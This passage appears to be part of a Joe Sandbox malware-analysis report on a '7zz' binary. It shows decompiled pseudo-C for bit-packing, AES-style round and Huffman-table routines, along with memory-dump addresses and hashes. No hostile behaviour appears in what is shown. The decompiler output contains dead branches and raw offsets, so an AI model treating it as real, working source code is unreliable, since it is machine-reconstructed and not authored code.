						_t193 =  *((intOrPtr*)(_t299 + 0x4a8)) + _t120 * 4;
						 *((intOrPtr*)(_t309 + 0x20)) = _t193;
						_t122 =  *_t193;
						if(_t122 < 0x8000) {
							_t123 = _t122 & 0x0000ffff;
							 *(_t309 + 0x14) = _t123;
							_t297 = _t299 + 0x470;
							 *((intOrPtr*)(_t309 + 0x1c)) = 0;
							_t172 =  *(_t299 + 0x1180);
							_t291 = 0;
							__eflags = 0;
							if(0 > 0) {
								while(1) {
									_t152 =  *(_t297 + 0x28);
									__eflags = _t291 - _t152;
									if(_t291 < _t152) {
										break;
									}
									_t291 = _t291 - _t152;
									 *( *((intOrPtr*)(_t297 + 4)) +  *_t297) = _t172 << 0x00000008 - _t152 |  *(_t297 + 0x2c);
									_t308 =  *((intOrPtr*)(_t297 + 4)) + 1;
									 *((intOrPtr*)(_t297 + 4)) = _t308;
									__eflags = _t308 -  *((intOrPtr*)(_t297 + 8));
									if(__eflags == 0) {
										L0040EFBD(_t297, __eflags);
									}
									 *(_t297 + 0x28) = 8;
									_t172 = _t172 >>  *(_t297 + 0x28);
									__eflags = _t291;
									 *(_t297 + 0x2c) = 0;
									if(_t291 > 0) {
										continue;
									} else {
									}
									L16:
									_t123 =  *(_t309 + 0x14);
									_t299 =  *((intOrPtr*)(_t309 + 0x10));
									goto L17;
								}
								_t304 =  *(_t297 + 0x28);
								_t305 = _t304 - _t291;
								__eflags = _t305;
								 *(_t297 + 0x2c) =  *(_t297 + 0x2c) | ((0x00000001 << _t291) - 0x00000001 & _t172) << 0x00000008 - _t304;
								 *(_t297 + 0x28) = _t305;
								goto L16;
							}
							L17:
							_t292 = 0;
							__eflags = 0;
							_t177 = _t123;
							if(0 > 0) {
								while(1) {
									_t145 =  *(_t297 + 0x28);
									__eflags = _t292 - _t145;
									if(_t292 < _t145) {
										break;
									}
									_t292 = _t292 - _t145;
									 *( *_t297 +  *((intOrPtr*)(_t297 + 4))) = _t177 << 0x00000008 - _t145 |  *(_t297 + 0x2c);
									_t289 =  *((intOrPtr*)(_t297 + 4)) + 1;
									 *((intOrPtr*)(_t297 + 4)) = _t289;
									__eflags = _t289 -  *((intOrPtr*)(_t297 + 8));
									if(__eflags == 0) {
										L0040EFBD(_t297, __eflags);
									}
									 *(_t297 + 0x28) = 8;
									_t177 = _t177 >>  *(_t297 + 0x28);
									__eflags = _t292;
									 *(_t297 + 0x2c) = 0;
									if(_t292 > 0) {
										continue;
									} else {
									}
									goto L24;
								}
								_t146 =  *(_t297 + 0x28);
								_t147 = _t146 - _t292;
								__eflags = _t147;
								 *(_t297 + 0x2c) =  *(_t297 + 0x2c) | ((0x00000001 << _t292) - 0x00000001 & _t177) << 0x00000008 - _t146;
								 *(_t297 + 0x28) = _t147;
							}
							L24:
							_t126 =  *((intOrPtr*)( *((intOrPtr*)(_t309 + 0x20)) + 2));
							__eflags = 0 - 0x200;
							 *(_t309 + 0x14) = 0;
							if(0 >= 0x200) {
								_t301 = 0x10;
								__eflags = 0x10;
							} else {
								_t301 = 0;
							}
							_t178 =  *( *((intOrPtr*)(_t309 + 0x10)) + 0x11fc + _t301 * 4);
							_t293 = 0;
							__eflags = 0;
							if(0 > 0) {
								while(1) {
									_t137 =  *(_t297 + 0x28);
									__eflags = _t293 - _t137;
									if(_t293 < _t137) {
										break;
									}
									_t293 = _t293 - _t137;
									 *( *_t297 +  *((intOrPtr*)(_t297 + 4))) = _t178 << 0x00000008 - _t137 |  *(_t297 + 0x2c);
									_t277 =  *((intOrPtr*)(_t297 + 4)) + 1;
									 *((intOrPtr*)(_t297 + 4)) = _t277;
									__eflags = _t277 -  *((intOrPtr*)(_t297 + 8));
									if(__eflags == 0) {
										L0040EFBD(_t297, __eflags);
									}
									 *(_t297 + 0x28) = 8;
									_t178 = _t178 >>  *(_t297 + 0x28);
									__eflags = _t293;
									 *(_t297 + 0x2c) = 0;
									if(_t293 > 0) {
										continue;
									} else {
									}
									L34:
									_t126 =  *(_t309 + 0x14);
									goto L35;
								}
								_t138 =  *(_t297 + 0x28);
								_t139 = _t138 - _t293;
								__eflags = _t139;
								 *(_t297 + 0x2c) =  *(_t297 + 0x2c) | ((0x00000001 << _t293) - 0x00000001 & _t178) << 0x00000008 - _t138;
								 *(_t297 + 0x28) = _t139;
								goto L34;
							}
							L35:
							_t294 = 0;
							__eflags = 0;
							_t179 = _t126 -  *((intOrPtr*)(0x47c134 + _t301 * 4));
							if(0 > 0) {
								while(1) {
									_t129 =  *(_t297 + 0x28);
									__eflags = _t294 - _t129;
									if(_t294 < _t129) {
										goto L39;
									}
									_t294 = _t294 - _t129;
									L0042F593(_t179, _t297, _t179 << 0x00000008 - _t129 |  *(_t297 + 0x2c));
									 *(_t297 + 0x28) = 8;
									_t179 = _t179 >>  *(_t297 + 0x28);
									__eflags = _t294;
									 *(_t297 + 0x2c) = 0;
									if(__eflags > 0) {
										continue;
									} else {
									}
									goto L40;
								}
								goto L39;
							}
							goto L40;
						} else {
							_t297 = _t299 + 0x470;
							_t179 =  *(_t299 + 0xd7c);
							_t294 = 0;
							if(0 > 0) {
								while(1) {
									_t165 =  *(_t297 + 0x28);
									if(_t294 < _t165) {
										break;
									}
									_t294 = _t294 - _t165;
									 *( *((intOrPtr*)(_t297 + 4)) +  *_t297) = _t179 << 0x00000008 - _t165 |  *(_t297 + 0x2c);
									_t266 =  *((intOrPtr*)(_t297 + 4)) + 1;
									 *((intOrPtr*)(_t297 + 4)) = _t266;
									_t314 = _t266 -  *((intOrPtr*)(_t297 + 8));
									if(_t266 ==  *((intOrPtr*)(_t297 + 8))) {
										L0040EFBD(_t297, _t314);
									}
									 *(_t297 + 0x28) = 8;
									_t179 = _t179 >>  *(_t297 + 0x28);
									 *(_t297 + 0x2c) = 0;
									if(_t294 > 0) {
										continue;
									} else {
									}
									goto L41;
								}
								L39:
								_t302 =  *(_t297 + 0x28);
								_t303 = _t302 - _t294;
								__eflags = _t303;
								 *(_t297 + 0x2c) =  *(_t297 + 0x2c) | ((0x00000001 << _t294) - 0x00000001 & _t179) << 0x00000008 - _t302;
								 *(_t297 + 0x28) = _t303;
								L40:
								_t299 =  *((intOrPtr*)(_t309 + 0x10));
							}
						}
						L41:
						_t120 =  *(_t309 + 0x18) + 1;
						 *(_t309 + 0x18) = _t120;
					} while (_t120 <  *((intOrPtr*)(_t299 + 0x508)));
				}
				return E0044CDD0(_t299 + 0x470,  *((intOrPtr*)(_t299 + 0x117c)), 0);
			}





































                                                                                  0x0044ca44
                                                                                  0x0044ca4b
                                                                                  0x0044ca5b
                                                                                  0x0044ca6e
                                                                                  0x0044ca79
                                                                                  0x0044ca7d
                                                                                  0x0044ca81
                                                                                  0x0044ca8a
                                                                                  0x0044ca90
                                                                                  0x0044ca93
                                                                                  0x0044ca97
                                                                                  0x0044ca9e
                                                                                  0x0044cb1b
                                                                                  0x0044cb24
                                                                                  0x0044cb2e
                                                                                  0x0044cb34
                                                                                  0x0044cb3f
                                                                                  0x0044cb46
                                                                                  0x0044cb48
                                                                                  0x0044cb4a
                                                                                  0x0044cb4c
                                                                                  0x0044cb4c
                                                                                  0x0044cb4f
                                                                                  0x0044cb51
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0044cb58
                                                                                  0x0044cb6a
                                                                                  0x0044cb73
                                                                                  0x0044cb76
                                                                                  0x0044cb79
                                                                                  0x0044cb7b
                                                                                  0x0044cb7f
                                                                                  0x0044cb84
                                                                                  0x0044cb8b
                                                                                  0x0044cb92
                                                                                  0x0044cb94
                                                                                  0x0044cb96
                                                                                  0x0044cb9a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0044cb9c
                                                                                  0x0044cbc1
                                                                                  0x0044cbc1
                                                                                  0x0044cbc5
                                                                                  0x00000000
                                                                                  0x0044cbc5
                                                                                  0x0044cb9e
                                                                                  0x0044cbb9
                                                                                  0x0044cbb9
                                                                                  0x0044cbbb
                                                                                  0x0044cbbe
                                                                                  0x00000000
                                                                                  0x0044cbbe
                                                                                  0x0044cbc9
                                                                                  0x0044cbda
                                                                                  0x0044cbe3
                                                                                  0x0044cbe5
                                                                                  0x0044cbe7
                                                                                  0x0044cbe9
                                                                                  0x0044cbe9
                                                                                  0x0044cbec
                                                                                  0x0044cbee
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0044cbf9
                                                                                  0x0044cc07
                                                                                  0x0044cc10
                                                                                  0x0044cc13
                                                                                  0x0044cc16
                                                                                  0x0044cc18
                                                                                  0x0044cc1c
                                                                                  0x0044cc1c
                                                                                  0x0044cc24
                                                                                  0x0044cc2b
                                                                                  0x0044cc2d
                                                                                  0x0044cc2f
                                                                                  0x0044cc33
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0044cc35
                                                                                  0x00000000
                                                                                  0x0044cc33
                                                                                  0x0044cc37
                                                                                  0x0044cc52
                                                                                  0x0044cc52
                                                                                  0x0044cc54
                                                                                  0x0044cc57
                                                                                  0x0044cc57
                                                                                  0x0044cc5a
                                                                                  0x0044cc60
                                                                                  0x0044cc64
                                                                                  0x0044cc69
                                                                                  0x0044cc6d
                                                                                  0x0044cc8a
                                                                                  0x0044cc8a
                                                                                  0x0044cc6f
                                                                                  0x0044cc77
                                                                                  0x0044cc77
                                                                                  0x0044cc9a
                                                                                  0x0044cca1
                                                                                  0x0044cca3
                                                                                  0x0044cca5
                                                                                  0x0044cca7
                                                                                  0x0044cca7
                                                                                  0x0044ccaa
                                                                                  0x0044ccac
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0044ccb3
                                                                                  0x0044ccc5
                                                                                  0x0044ccce
                                                                                  0x0044ccd1
                                                                                  0x0044ccd4
                                                                                  0x0044ccd6
                                                                                  0x0044ccda
                                                                                  0x0044ccda
                                                                                  0x0044cce2
                                                                                  0x0044cce9
                                                                                  0x0044cceb
                                                                                  0x0044cced
                                                                                  0x0044ccf1
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0044ccf3
                                                                                  0x0044cd18
                                                                                  0x0044cd18
                                                                                  0x00000000
                                                                                  0x0044cd18
                                                                                  0x0044ccf5
                                                                                  0x0044cd10
                                                                                  0x0044cd10
                                                                                  0x0044cd12
                                                                                  0x0044cd15
                                                                                  0x00000000
                                                                                  0x0044cd15
                                                                                  0x0044cd1c
                                                                                  0x0044cd24
                                                                                  0x0044cd2f
                                                                                  0x0044cd31
                                                                                  0x0044cd33
                                                                                  0x0044cd35
                                                                                  0x0044cd35
                                                                                  0x0044cd38
                                                                                  0x0044cd3a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0044cd45
                                                                                  0x0044cd51
                                                                                  0x0044cd59
                                                                                  0x0044cd60
                                                                                  0x0044cd62
                                                                                  0x0044cd64
                                                                                  0x0044cd68
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0044cd6a
                                                                                  0x00000000
                                                                                  0x0044cd68
                                                                                  0x00000000
                                                                                  0x0044cd35
                                                                                  0x00000000
                                                                                  0x0044caa0
                                                                                  0x0044caa8
                                                                                  0x0044cab5
                                                                                  0x0044cabc
                                                                                  0x0044cac0
                                                                                  0x0044cac6
                                                                                  0x0044cac6
                                                                                  0x0044cacb
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0044cad6
                                                                                  0x0044cae8
                                                                                  0x0044caf1
                                                                                  0x0044caf4
                                                                                  0x0044caf7
                                                                                  0x0044caf9
                                                                                  0x0044cafd
                                                                                  0x0044cafd
                                                                                  0x0044cb05
                                                                                  0x0044cb0c
                                                                                  0x0044cb10
                                                                                  0x0044cb14
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0044cb16
                                                                                  0x00000000
                                                                                  0x0044cb14
                                                                                  0x0044cd6c
                                                                                  0x0044cd6c
                                                                                  0x0044cd87
                                                                                  0x0044cd87
                                                                                  0x0044cd89
                                                                                  0x0044cd8c
                                                                                  0x0044cd8f
                                                                                  0x0044cd8f
                                                                                  0x0044cd8f
                                                                                  0x0044cac0
                                                                                  0x0044cd93
                                                                                  0x0044cd9d
                                                                                  0x0044cda0
                                                                                  0x0044cda0
                                                                                  0x0044cdac
                                                                                  0x0044cdcc

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5364b3d38da24dceb4fc74032ce6d375fea4b89270f7dfad01ac66195bbe4028
                                                                                  • Instruction ID: f1a358e19409f11fecb9658b58595b2dff66520b4aac72c743e58953db3de8aa
                                                                                  • Opcode Fuzzy Hash: 5364b3d38da24dceb4fc74032ce6d375fea4b89270f7dfad01ac66195bbe4028
                                                                                  • Instruction Fuzzy Hash: B2B1C535205B418FD724DE39D4D02ABBBE2EFDA314F14892ED4DE87751DA34A90ACB48
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0046A460 Relevance: .3, Instructions: 300COMMONCrypto
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E0046A460(intOrPtr* __eax, signed int* __ecx) {
				signed int* _t169;
				unsigned int _t171;
				unsigned int _t178;
				unsigned int _t213;
				signed int* _t254;
				unsigned int _t262;
				unsigned int _t266;
				unsigned int _t273;
				unsigned int _t284;
				unsigned int _t289;
				signed int _t365;
				unsigned int _t375;
				unsigned int _t385;
				signed int _t409;
				void* _t437;

				_t171 =  *(__eax + 0x1c) ^ __ecx[3];
				_t266 =  *(__eax + 0x14) ^ __ecx[1];
				 *((intOrPtr*)(_t437 + 0xc)) =  *__eax;
				_t213 =  *(__eax + 0x18) ^ __ecx[2];
				_t289 =  *(__eax + 0x10) ^  *__ecx;
				 *(_t437 + 0x2c) = _t266;
				 *(_t437 + 0x14) = _t266 >> 0x00000008 & 0x000000ff;
				 *(_t437 + 0x28) = _t289;
				_t375 =  *(0x491968 + (_t171 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x491d68 + (_t289 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x492168 + (_t266 >> 0x18) * 4) ^  *(0x491568 + (_t213 & 0x000000ff) * 4) ^  *(__eax + 0x28);
				_t273 =  *(0x491d68 + (_t213 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x491968 +  *(_t437 + 0x14) * 4) ^  *(0x492168 + (_t171 >> 0x18) * 4) ^  *(0x491568 + (_t289 & 0x000000ff) * 4) ^  *(__eax + 0x20);
				_t169 = __eax + 0x20;
				_t409 =  *(0x491d68 + ( *(_t437 + 0x2c) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x491968 + (_t289 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x492168 + (_t213 >> 0x18) * 4) ^  *(0x491568 + (_t171 & 0x000000ff) * 4) ^ _t169[3];
				_t178 =  *(0x491d68 + (_t171 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x491968 + (_t213 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x492168 + ( *(_t437 + 0x28) >> 0x18) * 4) ^  *(0x491568 + ( *(_t437 + 0x2c) & 0x000000ff) * 4) ^ _t169[1];
				_t52 = _t437 + 0x10;
				 *_t52 =  *((intOrPtr*)(_t437 + 0x10)) - 1;
				 *(_t437 + 0x20) = _t375;
				 *(_t437 + 0x18) = _t273;
				if( *_t52 != 0) {
					do {
						 *(_t437 + 0x14) = _t375 >> 0x00000010 & 0x000000ff;
						 *(_t437 + 0x14) = _t273 >> 0x00000008 & 0x000000ff;
						_t385 =  *(0x491968 + (_t178 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x491d68 +  *(_t437 + 0x14) * 4) ^  *(0x492168 + (_t409 >> 0x18) * 4) ^  *(0x491568 + (_t273 & 0x000000ff) * 4) ^ _t169[4];
						_t284 =  *(0x491d68 + (_t178 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x491968 +  *(_t437 + 0x14) * 4) ^  *(0x492168 + ( *(_t437 + 0x20) >> 0x18) * 4) ^  *(0x491568 + (_t409 & 0x000000ff) * 4) ^ _t169[7];
						_t262 =  *(0x491968 + (_t409 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x491d68 + (_t273 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x492168 + (_t178 >> 0x18) * 4) ^  *(0x491568 + (_t375 & 0x000000ff) * 4) ^ _t169[6];
						 *(_t437 + 0x14) =  *(_t437 + 0x20) >> 0x00000008 & 0x000000ff;
						_t365 =  *(0x491d68 + (_t409 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x491968 +  *(_t437 + 0x14) * 4) ^  *(0x492168 + ( *(_t437 + 0x18) >> 0x18) * 4) ^  *(0x491568 + (_t178 & 0x000000ff) * 4) ^ _t169[5];
						_t169 =  &(_t169[8]);
						 *(_t437 + 0x20) =  *(0x491968 + (_t284 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x491d68 + (_t385 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x492168 + (_t365 >> 0x18) * 4) ^  *(0x491568 + (_t262 & 0x000000ff) * 4) ^ _t169[2];
						 *(_t437 + 0x18) =  *(0x491d68 + (_t262 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x491968 + (_t365 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x492168 + (_t284 >> 0x18) * 4) ^  *(0x491568 + (_t385 & 0x000000ff) * 4) ^  *_t169;
						_t409 =  *(0x491d68 + (_t365 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x491968 + (_t385 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x492168 + (_t262 >> 0x18) * 4) ^  *(0x491568 + (_t284 & 0x000000ff) * 4) ^ _t169[3];
						_t273 =  *(_t437 + 0x18);
						_t375 =  *(_t437 + 0x20);
						_t178 =  *(0x491d68 + (_t284 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x491968 + (_t262 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x492168 + (_t385 >> 0x18) * 4) ^  *(0x491568 + (_t365 & 0x000000ff) * 4) ^ _t169[1];
						_t140 = _t437 + 0x10;
						 *_t140 =  *((intOrPtr*)(_t437 + 0x10)) - 1;
					} while ( *_t140 != 0);
				}
				 *( *(_t437 + 0x3c)) = ((( *((_t375 >> 0x00000010 & 0x000000ff) + 0x48dc78) & 0x000000ff | ( *((_t409 >> 0x18) + 0x48dc78) & 0x000000ff) << 0x00000008) << 0x00000008 |  *((_t178 >> 0x00000008 & 0x000000ff) + 0x48dc78) & 0x000000ff) << 0x00000008 |  *((_t273 & 0x000000ff) + 0x48dc78) & 0x000000ff) ^ _t169[4];
				( *(_t437 + 0x3c))[1] = ((( *((_t409 >> 0x00000010 & 0x000000ff) + 0x48dc78) & 0x000000ff | ( *((_t273 >> 0x18) + 0x48dc78) & 0x000000ff) << 0x00000008) << 0x00000008 |  *((_t375 >> 0x00000008 & 0x000000ff) + 0x48dc78) & 0x000000ff) << 0x00000008 |  *((_t178 & 0x000000ff) + 0x48dc78) & 0x000000ff) ^ _t169[5];
				_t254 =  *(_t437 + 0x3c);
				_t254[2] = ((( *((_t273 >> 0x00000010 & 0x000000ff) + 0x48dc78) & 0x000000ff | ( *((_t178 >> 0x18) + 0x48dc78) & 0x000000ff) << 0x00000008) << 0x00000008 |  *((_t409 >> 0x00000008 & 0x000000ff) + 0x48dc78) & 0x000000ff) << 0x00000008 |  *((_t375 & 0x000000ff) + 0x48dc78) & 0x000000ff) ^ _t169[6];
				_t254[3] = ((( *((_t178 >> 0x00000010 & 0x000000ff) + 0x48dc78) & 0x000000ff | ( *((_t375 >> 0x18) + 0x48dc78) & 0x000000ff) << 0x00000008) << 0x00000008 |  *((_t273 >> 0x00000008 & 0x000000ff) + 0x48dc78) & 0x000000ff) << 0x00000008 |  *((_t409 & 0x000000ff) + 0x48dc78) & 0x000000ff) ^ _t169[7];
				return _t169;
			}


















                                                                                  0x0046a46e
                                                                                  0x0046a471
                                                                                  0x0046a476
                                                                                  0x0046a47d
                                                                                  0x0046a484
                                                                                  0x0046a4c5
                                                                                  0x0046a4dd
                                                                                  0x0046a515
                                                                                  0x0046a529
                                                                                  0x0046a52c
                                                                                  0x0046a57c
                                                                                  0x0046a599
                                                                                  0x0046a59c
                                                                                  0x0046a59f
                                                                                  0x0046a59f
                                                                                  0x0046a5a3
                                                                                  0x0046a5a7
                                                                                  0x0046a5ab
                                                                                  0x0046a5b1
                                                                                  0x0046a604
                                                                                  0x0046a649
                                                                                  0x0046a66f
                                                                                  0x0046a683
                                                                                  0x0046a68f
                                                                                  0x0046a69b
                                                                                  0x0046a6ce
                                                                                  0x0046a70e
                                                                                  0x0046a714
                                                                                  0x0046a75e
                                                                                  0x0046a7a8
                                                                                  0x0046a7b1
                                                                                  0x0046a7cf
                                                                                  0x0046a7e0
                                                                                  0x0046a7e3
                                                                                  0x0046a7e3
                                                                                  0x0046a7e3
                                                                                  0x0046a5b1
                                                                                  0x0046a842
                                                                                  0x0046a899
                                                                                  0x0046a8ed
                                                                                  0x0046a8f1
                                                                                  0x0046a93d
                                                                                  0x0046a947

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9d85033acdc5af3603231ca3bb88f19969520e1c4114c2203dc3061eb624cb0d
                                                                                  • Instruction ID: 75d05c7fad47a1a52beca39c83a488ef50f93caae19ee7ec22463264903e5419
                                                                                  • Opcode Fuzzy Hash: 9d85033acdc5af3603231ca3bb88f19969520e1c4114c2203dc3061eb624cb0d
                                                                                  • Instruction Fuzzy Hash: 01D1BB728147A74FE318DF5DDC902357762AFD8250F0B063AC7951B2A2CB34BA11DB94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0044A440 Relevance: .3, Instructions: 291COMMONCrypto
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 72%
                                                                                  			E0044A440(void* __ecx, void* __eflags) {
				void* _t114;
				intOrPtr _t128;
				void* _t132;
				signed int _t165;
				void* _t176;
				signed int _t179;
				void* _t191;
				unsigned int _t194;
				intOrPtr _t196;
				signed int _t197;
				signed int _t204;
				signed int _t205;
				signed int _t211;
				unsigned int _t220;
				unsigned int _t221;
				signed int _t222;
				signed char _t239;
				intOrPtr* _t244;
				int _t245;
				intOrPtr _t246;
				unsigned int _t258;
				void* _t274;
				int _t285;
				void* _t288;
				void* _t290;
				void* _t291;
				signed int _t292;
				void* _t293;
				void* _t294;
				void* _t295;
				void* _t296;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t304;
				void* _t305;

				_t293 = __ecx;
				 *((char*)(__ecx + 0xd48)) = E0044A200(1) & 0xffffff00 | _t112 == 0x00000001;
				_t114 = E0044A200(2);
				if(_t114 <= 2) {
					if(_t114 != 0) {
						 *((char*)(__ecx + 0xd49)) = 0;
						if(_t114 != 1) {
							 *((intOrPtr*)(_t294 + 0x20)) = E0044A200(5) + 0x101;
							 *((intOrPtr*)(__ecx + 0xd4c)) = E0044A200(5) + 1;
							_t176 = E0044A200(4) + 4;
							if( *((intOrPtr*)(__ecx + 0xd51)) != 0 ||  *((intOrPtr*)(__ecx + 0xd4c)) <= 0x1e) {
								_t285 = 0;
								do {
									if(_t285 >= _t176) {
										 *((char*)(_t294 + 0x20)) = 0;
									} else {
										 *((char*)(_t294 + 0x20)) = E0044A200(3);
									}
									_t285 = _t285 + 1;
								} while (_t285 < 0x13);
								_t244 = _t293 + 0xaf8;
								memset(_t294 + 0x38, 0, 0xf << 2);
								_t295 = _t294 + 0xc;
								_t258 = 0;
								_t191 = 0;
								while(0 <= 0xf) {
									 *_t244 = 0xffffffff;
									_t191 = _t191 + 1;
									_t244 = _t244 + 4;
									 *((intOrPtr*)(_t295 + 0x34)) =  *((intOrPtr*)(_t295 + 0x34)) + 1;
									if(_t191 < 0x13) {
										continue;
									} else {
										_t128 = 0;
										 *(_t295 + 0x34) = _t258;
										 *(_t293 + 0xa78) = _t258;
										 *(_t293 + 0xab8) = _t258;
										 *((intOrPtr*)(_t295 + 0x10)) = 0;
										_t245 = 1;
										while(1) {
											_t288 = _t295 + 0x34 + _t245 * 4;
											_t258 = _t258 + ( *(_t295 + 0x34 + _t245 * 4) << 0xf - _t245);
											 *(_t295 + 0x18) = _t258;
											if(_t258 > 0x8000) {
												goto L35;
											}
											_t194 = 0x8000;
											if(_t245 != 0xf) {
												_t194 = _t258;
											}
											 *(_t293 + 0xa78 + _t245 * 4) = _t194;
											_t196 =  *((intOrPtr*)(_t293 + 0xab4 + _t245 * 4)) +  *((intOrPtr*)(_t288 - 4));
											 *((intOrPtr*)(_t293 + 0xab8 + _t245 * 4)) = _t196;
											 *((intOrPtr*)(_t295 + 0x1b4 + _t245 * 4)) = _t196;
											if(_t245 <= 9) {
												_t220 =  *(_t293 + 0xa78 + _t245 * 4) >> 6;
												if(_t128 < _t220) {
													_t75 = _t293 + 0xb44; // 0xb44
													_t274 = _t128 + _t75;
													_t221 = _t220 - _t128;
													 *(_t295 + 0x14) = _t221;
													_t292 = _t221;
													_t222 = _t221 >> 2;
													memset(_t274 + _t222, memset(_t274, _t245, _t222 << 2), (_t292 & 0x00000003) << 0);
													_t295 = _t295 + 0x18;
													_t258 =  *(_t295 + 0x18);
													_t128 =  *((intOrPtr*)(_t295 + 0x10)) + _t292;
													 *((intOrPtr*)(_t295 + 0x10)) = _t128;
												}
											}
											_t245 = _t245 + 1;
											if(_t245 <= 0xf) {
												continue;
											} else {
												_t246 = 0;
												do {
													if(0 != 0) {
														_t197 =  *(_t295 + 0x1b4);
														 *((intOrPtr*)(_t293 + 0xaf8 + _t197 * 4)) = _t246;
														 *(_t295 + 0x1b4) = _t197 + 1;
													}
													_t246 = _t246 + 1;
												} while (_t246 < 0x13);
												_t179 =  *(_t295 + 0x1c);
												_t132 = E0044A2A0(_t295 + 0x1f4, _t179 +  *(_t293 + 0xd4c));
												if(_t132 != 0) {
													_t290 = _t295 + 0x1f4;
													memset(_t295 + 0x175, 0, 7 << 2);
													_t296 = _t295 + 0xc;
													asm("stosw");
													asm("stosb");
													memset(_t296 + 0x194, 0, 8 << 2);
													_t297 = _t296 + 0xc;
													_t204 = _t179;
													_t205 = _t204 >> 2;
													memcpy(_t297 + 0x74, _t290, _t205 << 2);
													memcpy(_t290 + _t205 + _t205, _t290, _t204 & 0x00000003);
													_t299 = _t297 + 0x18;
													_t291 = _t299 + _t179 + 0x1f4;
													_t211 =  *(_t293 + 0xd4c) >> 2;
													memcpy(_t291 + _t211 + _t211, _t291, memcpy(_t299 + 0x194, _t291, _t211 << 2) & 0x00000003);
													_t301 = _t299 + 0x18;
													goto L34;
												} else {
													return _t132;
												}
											}
											goto L37;
										}
										goto L35;
									}
									goto L37;
								}
								goto L35;
							} else {
								return 0;
							}
						} else {
							memset(_t294 + 0x74, 0x8080808, 0x24 << 2);
							_t303 = _t294 + 0xc;
							memset(_t303 + 0x104, 0x9090909, 0x1c << 2);
							_t304 = _t303 + 0xc;
							memset(_t304 + 0x174, 0x7070707, 6 << 2);
							_t305 = _t304 + 0xc;
							 *(_t305 + 0x18c) = 0x8080808;
							 *(_t305 + 0x190) = 0x8080808;
							memset(_t305 + 0x194, 0x5050505, 8 << 2);
							_t301 = _t305 + 0xc;
							asm("sbb eax, eax");
							 *(_t293 + 0xd4c) = ( ~( *(_t293 + 0xd51)) & 0x00000002) + 0x1e;
							L34:
